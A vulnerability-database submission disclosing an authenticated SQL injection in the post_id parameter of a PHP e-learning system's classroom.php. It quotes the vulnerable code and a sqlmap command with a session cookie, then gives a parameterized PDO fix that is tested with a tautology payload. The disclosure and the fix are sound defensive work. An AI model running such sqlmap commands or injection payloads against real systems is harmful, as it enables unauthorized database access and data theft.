| Title | SQL injection in Simple E-Learning System (authenticated) |
|---|---|
| Description | The E-Learning System source code URL: https://www.sourcecodester.com/php-simple-e-learning-system-source-code

In classroom.php, line 42, the code is as below:

```php
// Excerpt: the request parameter goes into the query text unchanged.
if (isset($_GET['post_id'])) {
    $post_id = $_GET['post_id'];
    $data_query = mysqli_query($con, "SELECT body FROM posts WHERE id='$post_id'");
    $body = mysqli_fetch_array($data_query);
```

The post_id is spliced directly into the SQL query statement, and $body is echoed directly at line 156, so there is an obvious SQL injection; you just need an authenticated user. We can use sqlmap to exploit it. The command is as below, with the cookie of your own user:

```
python .\sqlmap.py -u "http://127.0.0.1/vcs/classRoom.php?post_id=1&classCode=class101_a" --cookie="PHPSESSID=12blsndrn1t8gcphdj864gbrcu" --dbs
```
|
| Source | ⚠️ https://www.sourcecodester.com/php-simple-e-learning-system-source-code |
| User | wuerror (UID 30660) |
| Submission | 2022-08-05 05:01 (4 years ago) |
| Moderation | 2022-08-05 07:13 (2 hours later) |
| Status | Accepted |
| VulDB Entry | 205615 [SourceCodester Simple E-Learning System classroom.php post_id SQL injection] |
| Points | 17 |
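
The query pattern reported above next to a parameterized form, as an added example that is not code from Simple E-Learning System or from the submitter. Assumptions: `posts.id` is an integer column, the table contents and function names are constructed, and PDO with in-memory SQLite stands in for the application's mysqli/MySQL connection so the script runs on its own; the same bind-parameter approach is available in mysqli through `mysqli_prepare` and `mysqli_stmt_bind_param`.

```php
<?php
// Added example. Assumed schema: posts(id INTEGER, body TEXT); rows are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)");
$db->exec("INSERT INTO posts (id, body) VALUES (1, 'Week 1 notes'), (2, 'Week 2 notes')");

// Pattern from the report: the request value is concatenated into the SQL text,
// so quote characters in the value become part of the statement.
function body_concatenated(PDO $db, string $postId): array
{
    $rows = $db->query("SELECT body FROM posts WHERE id='$postId'");
    return $rows->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: check the type first, then pass the value as a bound parameter
// so it can never change the structure of the statement.
function body_parameterized(PDO $db, string $postId): array
{
    $id = filter_var($postId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // not a positive integer: reject before touching the database
    }
    $stmt = $db->prepare('SELECT body FROM posts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal id, and a value containing quote characters.
foreach (['2', "1' OR '1'='1"] as $input) {
    printf(
        "input=%-14s concatenated=%d row(s)  parameterized=%d row(s)\n",
        $input,
        count(body_concatenated($db, $input)),
        count(body_parameterized($db, $input))
    );
}
```

With the concatenated query the second input widens the `WHERE` clause and returns every row; the parameterized function rejects it at validation and would treat it as a literal value even if validation were removed.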